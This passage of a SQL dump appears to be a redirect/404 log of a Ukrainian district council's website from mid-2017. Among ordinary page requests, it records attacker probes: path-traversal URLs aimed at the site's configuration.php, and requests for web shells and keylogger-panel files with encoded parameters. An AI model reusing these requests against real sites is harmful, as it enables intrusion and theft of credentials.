00:00:00',301),(30652,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/gate.php',NULL,'','',2,0,'2017-06-05 23:41:17','0000-00-00 00:00:00',301),(30653,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/includes',NULL,'','',1,0,'2017-06-05 23:41:36','0000-00-00 00:00:00',301),(30654,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/includes/',NULL,'','',1,0,'2017-06-05 23:41:38','0000-00-00 00:00:00',301),(30655,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/statistics.php/',NULL,'','',1,0,'2017-06-05 23:41:46','0000-00-00 00:00:00',301),(30656,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/includes/database.php',NULL,'','',1,0,'2017-06-05 23:41:51','0000-00-00 00:00:00',301),(30657,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/includes/database.php/',NULL,'','',1,0,'2017-06-05 23:41:57','0000-00-00 00:00:00',301),(30658,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/gate.php/',NULL,'','',1,0,'2017-06-05 23:42:14','0000-00-00 00:00:00',301),(30659,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/includes/commands.php',NULL,'','',1,0,'2017-06-05 23:42:29','0000-00-00 00:00:00',301),(30660,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/includes/commands.php/',NULL,'','',1,0,'2017-06-05 23:42:34','0000-00-00 00:00:00',301),(30661,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/css/table_view.css',NULL,'','',1,0,'2017-06-05 23:42:48','0000-00-00 00:00:00',301),(30662,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/21421asdfdsf.php',NULL,'','',1,0,'2017-06-05 23:43:21','0000-00-00 00:00:00',301),(30663,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/webcams.php',NULL,'','',1,0,'2017-06-05 23:43:25','0000-00-00 00:00:00',301),(30664,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/deleteall.php',NULL,'','',1,0,'2017-06-05 23:43:32','0000-00-00 00:00:00',301),(30665,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/delete.php',NULL,'','',1,0,'2017-06-05 23:43:36','0000-00-00 00:00:00',301),(30666,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/passwords.php',NULL,'','',1,0,'2017-06-05 23:43:40','0000-00-00 00:00:00',301),(30667,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/keystrokes.php',NULL,'','',1,0,'2017-06-05 23:43:48','0000-00-00 00:00:00',301),(30668,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/post.php',NULL,'','',1,0,'2017-06-05 23:43:51','0000-00-00 00:00:00',301),(30669,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/create.php',NULL,'','',1,0,'2017-06-05 23:43:54','0000-00-00 00:00:00',301),(30670,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/language.php',NULL,'','',1,0,'2017-06-05 23:43:58','0000-00-00 00:00:00',301),(30671,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/admin/resources/images/',NULL,'','',2,0,'2017-06-05 23:44:15','0000-00-00 00:00:00',301),(30672,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/admin/resources/css/',NULL,'','',2,0,'2017-06-05 23:44:33','0000-00-00 00:00:00',301),(30673,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/admin/flags/',NULL,'','',2,0,'2017-06-05 23:44:47','0000-00-00 00:00:00',301),(30674,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/admin/images/',NULL,'','',2,0,'2017-06-05 23:44:57','0000-00-00 00:00:00',301),(30675,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/admin/resources/images/black/button/btn-arrow.gif',NULL,'','',1,0,'2017-06-05 23:45:02','0000-00-00 00:00:00',301),(30676,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/admin/resources/images/black/menu/menu.gif',NULL,'','',1,0,'2017-06-05 23:45:09','0000-00-00 00:00:00',301),(30677,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/admin/resources/images/default/button/btn-arrow.gif',NULL,'','',1,0,'2017-06-05 23:45:14','0000-00-00 00:00:00',301),(30678,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/admin/resources/images/default/menu/menu.gif',NULL,'','',1,0,'2017-06-05 23:45:29','0000-00-00 00:00:00',301),(30679,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/admin/images/save.png',NULL,'','',1,0,'2017-06-05 23:45:34','0000-00-00 00:00:00',301),(30680,'http://www.malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/admin/images/add.png',NULL,'','',1,0,'2017-06-05 23:45:35','0000-00-00 00:00:00',301),(30681,'http://malyn-rayrada.gov.ua/wp-content/uploads/51217766.php',NULL,'','',4,0,'2017-06-07 12:39:39','0000-00-00 00:00:00',301),(30682,'http://malyn-rayrada.gov.ua/license.php',NULL,'http://malyn-rayrada.gov.ua/wp-admin/','',23,0,'2017-06-07 12:39:46','0000-00-00 00:00:00',301),(30683,'http://malyn-rayrada.gov.ua//index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',2,0,'2017-06-07 19:16:21','0000-00-00 00:00:00',301),(30684,'http://malyn-rayrada.gov.ua/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php',NULL,'','',3,0,'2017-06-07 19:16:29','0000-00-00 00:00:00',301),(30685,'http://malyn-rayrada.gov.ua/plugins/content/s5_media_player/helper.php?fileurl=../../../configuration.php',NULL,'','',2,0,'2017-06-07 19:16:30','0000-00-00 00:00:00',301),(30686,'http://malyn-rayrada.gov.ua/index.php?option=com_macgallery&view=download&albumid=configuration.php',NULL,'','',2,0,'2017-06-07 19:16:30','0000-00-00 00:00:00',301),(30687,'http://www.malyn-rayrada.gov.ua/wp-content/uploads/51217766.php',NULL,'','',4,0,'2017-06-08 02:47:26','0000-00-00 00:00:00',301),(30688,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1744-pro-zvernennya-shchodo-zberezhennya-lisiv',NULL,'','',38,0,'2017-06-14 17:26:55','0000-00-00 00:00:00',301),(30689,'http://www.malyn-rayrada.gov.ua/blogs/wp-admin/setup-config.php',NULL,'','',1,0,'2017-06-14 19:13:19','0000-00-00 00:00:00',301),(30690,'http://www.malyn-rayrada.gov.ua/beta/wp-admin/setup-config.php',NULL,'','',1,0,'2017-06-14 19:13:19','0000-00-00 00:00:00',301),(30691,'http://www.malyn-rayrada.gov.ua/new/wp-admin/setup-config.php',NULL,'','',1,0,'2017-06-14 19:13:21','0000-00-00 00:00:00',301),(30692,'http://www.malyn-rayrada.gov.ua/news/wp-admin/setup-config.php',NULL,'','',1,0,'2017-06-14 19:13:21','0000-00-00 00:00:00',301),(30693,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1744-pro-zvernennya-shchodo-zberezhennya-lisiv',NULL,'','',61,0,'2017-06-15 06:07:31','0000-00-00 00:00:00',301),(30694,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1724-pro-priznachennya-direktora-komunalnogo-zakladu-tsentralna-rajonna-biblioteka-im-v-surativskogo-malinskoji-rajonnoji-radi',NULL,'','',49,0,'2017-06-16 13:20:37','0000-00-00 00:00:00',301),(30695,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-16-06-2017-roku/1752-pro-vnesennya-zmin-do-pereliku-sotsialnikh-poslug-umov-ta-poryadku-jikh-nadannya-strukturnimi-pidrozdilami-teritorialnogo-tsentru-sotsialnogo-obslugovuvannya',NULL,'','',14,0,'2017-06-16 16:29:53','0000-00-00 00:00:00',301),(30696,'http://malyn-rayrada.gov.ua/attachments/article/1431/ðÿñ–ð´ññƒð¼ðºð¸ ð²ñ–ð´ðºñ€ð¸ñ‚ð¾ð³ð¾ ð¿ð¾ñ–ð¼ðµð½ð½ð¾ð³ð¾ ð³ð¾ð»ð¾ññƒð²ð°ð½ð½ñ.pdf',NULL,'','',2,0,'2017-06-16 23:24:56','0000-00-00 00:00:00',301),(30697,'http://malyn-rayrada.gov.ua/d11a8746-8b99-4d9d-9594-7e554ee4bd75',NULL,'','',1,0,'2017-06-17 05:56:35','0000-00-00 00:00:00',301),(30698,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1738-pro-vnesennya-zmin-do-pereliku-sotsialnikh-poslug-umov-ta-poryadku-jikh-nadannya-strukturnimi-pidrozdilami-teritorialnogo-tsentru-sotsialnogo-obslugovuvannya',NULL,'','',47,0,'2017-06-17 08:11:51','0000-00-00 00:00:00',301),(30699,'http://www.malyn-rayrada.gov.ua/index.php/1745-do-vidoma-deputativ-rajonnoji-radi-2',NULL,'','',23,0,'2017-06-17 09:40:07','0000-00-00 00:00:00',301),(30700,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1724-pro-priznachennya-direktora-komunalnogo-zakladu-tsentralna-rajonna-biblioteka-im-v-surativskogo-malinskoji-rajonnoji-radi',NULL,'','',30,0,'2017-06-17 20:41:27','0000-00-00 00:00:00',301),(30701,'http://malyn-rayrada.gov.ua/index.php/1745-do-vidoma-deputativ-rajonnoji-radi-2',NULL,'','',34,0,'2017-06-18 08:19:05','0000-00-00 00:00:00',301),(30702,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-16-06-2017-roku/1752-pro-vnesennya-zmin-do-pereliku-sotsialnikh-poslug-umov-ta-poryadku-jikh-nadannya-strukturnimi-pidrozdilami-teritorialnogo-tsentru-sotsialnogo-obslugovuvannya',NULL,'','',17,0,'2017-06-19 07:38:28','0000-00-00 00:00:00',301),(30703,'http://malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1750-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2017-rik',NULL,'','',25,0,'2017-06-19 14:59:01','0000-00-00 00:00:00',301),(30704,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1750-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2017-rik',NULL,'','',20,0,'2017-06-19 20:39:19','0000-00-00 00:00:00',301),(30705,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/rishennja/rishennia-vid-16-06-2017-roku/1738-pro-vnesennya-zmin-do-pereliku-sotsialnikh-poslug-umov-ta-poryadku-jikh-nadannya-strukturnimi-pidrozdilami-teritorialnogo-tsentru-sotsialnogo-obslugovuvannya',NULL,'','',2,0,'2017-06-19 21:32:11','0000-00-00 00:00:00',301),(30706,'http://www.malyn-rayrada.gov.ua/images/1ndex.php?z3=sjfzbjz5lnboca==&z4=l2ltywdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:23:18','0000-00-00 00:00:00',301),(30707,'http://www.malyn-rayrada.gov.ua/sqlbak.php?z3=sjfzbjz5lnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:23:33','0000-00-00 00:00:00',301),(30708,'http://www.malyn-rayrada.gov.ua/email.php?z3=sjfzbjz5lnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:23:52','0000-00-00 00:00:00',301),(30709,'http://www.malyn-rayrada.gov.ua/functions.php?z3=sjfzbjz5lnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:24:00','0000-00-00 00:00:00',301),(30710,'http://www.malyn-rayrada.gov.ua/cache/news.php?z3=sjfzbjz5lnboca==&z4=l2nhy2hllw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:24:25','0000-00-00 00:00:00',301),(30711,'http://www.malyn-rayrada.gov.ua/tmp.php?z3=sjfzbjz5lnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',4,0,'2017-06-21 15:24:44','0000-00-00 00:00:00',301),(30712,'http://www.malyn-rayrada.gov.ua/shootme.php?z3=sjfzbjz5lnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:25:04','0000-00-00 00:00:00',301),(30713,'http://www.malyn-rayrada.gov.ua/robots.txt.php?z3=sjfzbjz5lnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:25:33','0000-00-00 00:00:00',301),(30714,'http://www.malyn-rayrada.gov.ua/jconfig.php?z3=sjfzbjz5lnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:25:47','0000-00-00 00:00:00',301),(30715,'http://www.malyn-rayrada.gov.ua/media/reads.php?z3=sjfzbjz5lnboca==&z4=l21lzglhlw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:26:01','0000-00-00 00:00:00',301),(30716,'http://www.malyn-rayrada.gov.ua/media/1ndex.php?z3=sjfzbjz5lnboca==&z4=l21lzglhlw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:26:17','0000-00-00 00:00:00',301),(30717,'http://www.malyn-rayrada.gov.ua/sql_dump.php?z3=sjfzbjz5lnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:26:19','0000-00-00 00:00:00',301),(30718,'http://www.malyn-rayrada.gov.ua/images/laj.php?z3=sjfzbjz5lnboca==&z4=l2ltywdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:26:29','0000-00-00 00:00:00',301),(30719,'http://www.malyn-rayrada.gov.ua/media/404.php?z3=sjfzbjz5lnboca==&z4=l21lzglhlw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:26:48','0000-00-00 00:00:00',301),(30720,'http://www.malyn-rayrada.gov.ua/media/tmp.php?z3=sjfzbjz5lnboca==&z4=l21lzglhlw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:27:01','0000-00-00 00:00:00',301),(30721,'http://www.malyn-rayrada.gov.ua/r3x.php?z3=sjfzbjz5lnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:27:07','0000-00-00 00:00:00',301),(30722,'http://www.malyn-rayrada.gov.ua/images/stories/0day.php?z3=sjfzbjz5lnboca==&z4=l2ltywdlcy9zdg9yawvzlw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:27:29','0000-00-00 00:00:00',301),(30723,'http://www.malyn-rayrada.gov.ua/includes/u2p.php?z3=sjfzbjz5lnboca==&z4=l2luy2x1zgvzlw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:27:40','0000-00-00 00:00:00',301),(30724,'http://www.malyn-rayrada.gov.ua/images/xxx.php?z3=sjfzbjz5lnboca==&z4=l2ltywdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:27:54','0000-00-00 00:00:00',301),(30725,'http://www.malyn-rayrada.gov.ua/al277.php?z3=sjfzbjz5lnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:28:00','0000-00-00 00:00:00',301),(30726,'http://www.malyn-rayrada.gov.ua/cache/cache_aqbmkwwx.php?z3=sjfzbjz5lnboca==&z4=l2nhy2hllw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:28:06','0000-00-00 00:00:00',301),(30727,'http://www.malyn-rayrada.gov.ua/install.php?z3=sjfzbjz5lnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:28:16','0000-00-00 00:00:00',301),(30728,'http://www.malyn-rayrada.gov.ua/dswat.org/wsdl.php?z3=sjfzbjz5lnboca==&z4=l2rzd2f0lm9yzy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:28:39','0000-00-00 00:00:00',301),(30729,'http://www.malyn-rayrada.gov.ua/robot.php?z3=sjfzbjz5lnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:28:49','0000-00-00 00:00:00',301),(30730,'http://www.malyn-rayrada.gov.ua/wsdl.php?z3=sjfzbjz5lnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:29:07','0000-00-00 00:00:00',301),(30731,'http://www.malyn-rayrada.gov.ua/site/tmp/ctivrc.php?z3=sjfzbjz5lnboca==&z4=l3npdguvdg1wlw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:29:39','0000-00-00 00:00:00',301),(30732,'http://www.malyn-rayrada.gov.ua/wp-main.php?z3=sjfzbjz5lnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:30:27','0000-00-00 00:00:00',301),(30733,'http://www.malyn-rayrada.gov.ua/images/al277.php?z3=sjfzbjz5lnboca==&z4=l2ltywdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:30:54','0000-00-00 00:00:00',301),(30734,'http://www.malyn-rayrada.gov.ua/webconfig.txt.php?z3=sjfzbjz5lnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:31:09','0000-00-00 00:00:00',301),(30735,'http://www.malyn-rayrada.gov.ua/thumb.php?z3=sjfzbjz5lnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:31:47','0000-00-00 00:00:00',301),(30736,'http://www.malyn-rayrada.gov.ua/sessioncontroller.php?z3=sjfzbjz5lnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:32:36','0000-00-00 00:00:00',301),(30737,'http://www.malyn-rayrada.gov.ua/maill.php?z3=sjfzbjz5lnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:32:43','0000-00-00 00:00:00',301),(30738,'http://www.malyn-rayrada.gov.ua/error-log.php?z3=sjfzbjz5lnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:33:11','0000-00-00 00:00:00',301),(30739,'http://www.malyn-rayrada.gov.ua/authenticating.php?z3=sjfzbjz5lnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:33:32','0000-00-00 00:00:00',301),(30740,'http://www.malyn-rayrada.gov.ua/images/google-assist.php?z3=sjfzbjz5lnboca==&z4=l2ltywdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:34:01','0000-00-00 00:00:00',301),(30741,'http://www.malyn-rayrada.gov.ua/images/robots.txt.php?z3=sjfzbjz5lnboca==&z4=l2ltywdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:34:32','0000-00-00 00:00:00',301),(30742,'http://www.malyn-rayrada.gov.ua/elements.php?z3=sjfzbjz5lnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:34:48','0000-00-00 00:00:00',301),(30743,'http://www.malyn-rayrada.gov.ua/xmlsrpc.php?z3=sjfzbjz5lnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:35:01','0000-00-00 00:00:00',301),(30744,'http://www.malyn-rayrada.gov.ua/wp-cache.php?z3=sjfzbjz5lnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:35:15','0000-00-00 00:00:00',301),(30745,'http://www.malyn-rayrada.gov.ua/images/404.php?z3=sjfzbjz5lnboca==&z4=l2ltywdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:35:40','0000-00-00 00:00:00',301),(30746,'http://www.malyn-rayrada.gov.ua/images/head.php?z3=sjfzbjz5lnboca==&z4=l2ltywdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:35:57','0000-00-00 00:00:00',301),(30747,'http://www.malyn-rayrada.gov.ua/cache/support.php?z3=sjfzbjz5lnboca==&z4=l2nhy2hllw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:36:15','0000-00-00 00:00:00',301),(30748,'http://www.malyn-rayrada.gov.ua/roseleif.php?z3=sjfzbjz5lnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:36:42','0000-00-00 00:00:00',301),(30749,'http://www.malyn-rayrada.gov.ua/abbrevsprl.php?z3=sjfzbjz5lnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:37:03','0000-00-00 00:00:00',301),(30750,'http://www.malyn-rayrada.gov.ua/show.php?z3=sjfzbjz5lnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:37:20','0000-00-00 00:00:00',301),(30751,'http://www.malyn-rayrada.gov.ua/images/defau1t.php?z3=sjfzbjz5lnboca==&z4=l2ltywdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:37:35','0000-00-00 00:00:00',301),(30752,'http://www.malyn-rayrada.gov.ua/cli/40dd1d.php?z3=sjfzbjz5lnboca==&z4=l2nsas8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:37:53','0000-00-00 00:00:00',301),(30753,'http://www.malyn-rayrada.gov.ua/infos.php?z3=sjfzbjz5lnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:38:08','0000-00-00 00:00:00',301),(30754,'http://www.malyn-rayrada.gov.ua/cache/defau1t.php?z3=sjfzbjz5lnboca==&z4=l2nhy2hllw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:38:30','0000-00-00 00:00:00',301),(30755,'http://www.malyn-rayrada.gov.ua/bookmark.php?z3=sjfzbjz5lnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:38:41','0000-00-00 00:00:00',301),(30756,'http://www.malyn-rayrada.gov.ua/configbak.php?z3=sjfzbjz5lnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:39:03','0000-00-00 00:00:00',301),(30757,'http://www.malyn-rayrada.gov.ua/wp-data.php?z3=sjfzbjz5lnboca==&z4=lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:39:09','0000-00-00 00:00:00',301),(30758,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/fbrrchive.php?z3=sjfzbjz5lnboca==&z4=l3dwlwnvbnrlbnqvcgx1z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:39:17','0000-00-00 00:00:00',301),(30759,'http://www.malyn-rayrada.gov.ua/wp-content/uploads/fbrrchive.php?z3=sjfzbjz5lnboca==&z4=l3dwlwnvbnrlbnqvdxbsb2fkcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:39:38','0000-00-00 00:00:00',301),(30760,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/myshe.php?z3=sjfzbjz5lnboca==&z4=l3dwlwnvbnrlbnqvcgx1z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:40:00','0000-00-00 00:00:00',301),(30761,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/wp-cache.php?z3=sjfzbjz5lnboca==&z4=l3dwlwnvbnrlbnqvcgx1z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:40:10','0000-00-00 00:00:00',301),(30762,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/wp-footers.php?z3=sjfzbjz5lnboca==&z4=l3dwlwnvbnrlbnqvcgx1z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:40:18','0000-00-00 00:00:00',301),(30763,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/wpfootes.php?z3=sjfzbjz5lnboca==&z4=l3dwlwnvbnrlbnqvcgx1z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:40:29','0000-00-00 00:00:00',301),(30764,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/sql_dump.php?z3=sjfzbjz5lnboca==&z4=l3dwlwnvbnrlbnqvcgx1z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:40:40','0000-00-00 00:00:00',301),(30765,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/socketiontrol.php?z3=sjfzbjz5lnboca==&z4=l3dwlwnvbnrlbnqvcgx1z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:40:49','0000-00-00 00:00:00',301),(30766,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/socketiasrgasfontrol.php?z3=sjfzbjz5lnboca==&z4=l3dwlwnvbnrlbnqvcgx1z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:40:59','0000-00-00 00:00:00',301),(30767,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/analyser.php?z3=sjfzbjz5lnboca==&z4=l3dwlwnvbnrlbnqvcgx1z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:41:19','0000-00-00 00:00:00',301),(30768,'http://www.malyn-rayrada.gov.ua/cache/list.php?z3=sjfzbjz5lnboca==&z4=l2nhy2hllw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-06-21 15:41:33','0000-00-00 00:00:00',301),(30769,'http://www.malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/j1sn6y.php',NULL,'','',1,0,'2017-06-21 15:46:38','0000-00-00 00:00:00',301),(30770,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/revslider/temp/update_extract/j1sn6y.php',NULL,'','',1,0,'2017-06-21 15:46:49','0000-00-00 00:00:00',301),(30771,'http://www.malyn-rayrada.gov.ua/wp-content/uploads/j1sn6y.php',NULL,'','',1,0,'2017-06-21 15:47:01','0000-00-00 00:00:00',301),(30772,'http://www.malyn-rayrada.gov.ua/j1sn6y.php',NULL,'','',1,0,'2017-06-21 15:47:22','0000-00-00 00:00:00',301),(30773,'http://www.malyn-rayrada.gov.ua/sites/all/libraries/elfinder/files/j1sn6y.php',NULL,'','',1,0,'2017-06-21 15:47:33','0000-00-00 00:00:00',301),(30774,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1738-pro-vnesennya-zmin-do-pereliku-sotsialnikh-poslug-umov-ta-poryadku-jikh-nadannya-strukturnimi-pidrozdilami-teritorialnogo-tsentru-sotsialnogo-obslugovuvannya',NULL,'','',50,0,'2017-06-21 23:46:20','0000-00-00 00:00:00',301),(30775,'http://www.malyn-rayrada.gov.ua/attachments/article/1709/ріш+змін+прог+пож+безп.pdf',NULL,'','',1,0,'2017-06-22 15:57:36','0000-00-00 00:00:00',301),(30776,'http://malyn-rayrada.gov.ua/cache/cachee.php',NULL,'http://malyn-rayrada.gov.ua/cache/cachee.php','',4,0,'2017-06-22 17:16:50','0000-00-00 00:00:00',301),(30777,'http://www.malyn-rayrada.gov.ua/attachments/article/1753/підсумки+відкритого+голосування.pdf',NULL,'','',1,0,'2017-06-23 05:42:28','0000-00-00 00:00:00',301),(30778,'http://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1766-pro-znyattya-z-kontrolyu-rishen-rajonnoji-radi',NULL,'http://www.malyn-rayrada.gov.ua/','',2,0,'2017-06-27 05:41:25','0000-00-00 00:00:00',301),(30779,'http://malyn-rayrada.gov.ua/0d3ab8e2-9578-4d0b-9bf1-532e11f33445',NULL,'','',1,0,'2017-06-29 18:13:59','0000-00-00 00:00:00',301),(30780,'http://malyn-rayrada.gov.ua/attachments/article/1753/ð¿ñ–ð´ñ ñƒð¼ðºð¸ ð²ñ–ð´ðºñ€ð¸ñ‚ð¾ð³ð¾ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ .pdf',NULL,'','',2,0,'2017-07-01 06:13:56','0000-00-00 00:00:00',301),(30781,'http://www.malyn-rayrada.gov.ua/press/wp-admin/setup-config.php',NULL,'','',1,0,'2017-07-02 17:36:58','0000-00-00 00:00:00',301),(30782,'http://www.malyn-rayrada.gov.ua/wp-admin/setup-config.php',NULL,'','',1,0,'2017-07-02 17:36:59','0000-00-00 00:00:00',301),(30783,'http://www.malyn-rayrada.gov.ua/main/wp-admin/setup-config.php',NULL,'','',1,0,'2017-07-02 17:36:59','0000-00-00 00:00:00',301),(30784,'http://www.malyn-rayrada.gov.ua/cms/wp-admin/setup-config.php',NULL,'','',1,0,'2017-07-02 17:36:59','0000-00-00 00:00:00',301),(30785,'http://www.malyn-rayrada.gov.ua/protal/wp-admin/setup-config.php',NULL,'','',1,0,'2017-07-02 17:36:59','0000-00-00 00:00:00',301),(30786,'http://malyn-rayrada.gov.ua/attachments/article/1708/ð”ð¾ð´ð°ñ‚ð¾ðº ð´ð¾ ñ€ñ–ñˆðµð½ð½ñ  ðÿð¾ñ€ñ ð´ð¾ðº ð¾ð±ð»ñ–ðºñƒ ð²ð¸ñ‚ñ€ð°ñ‚ 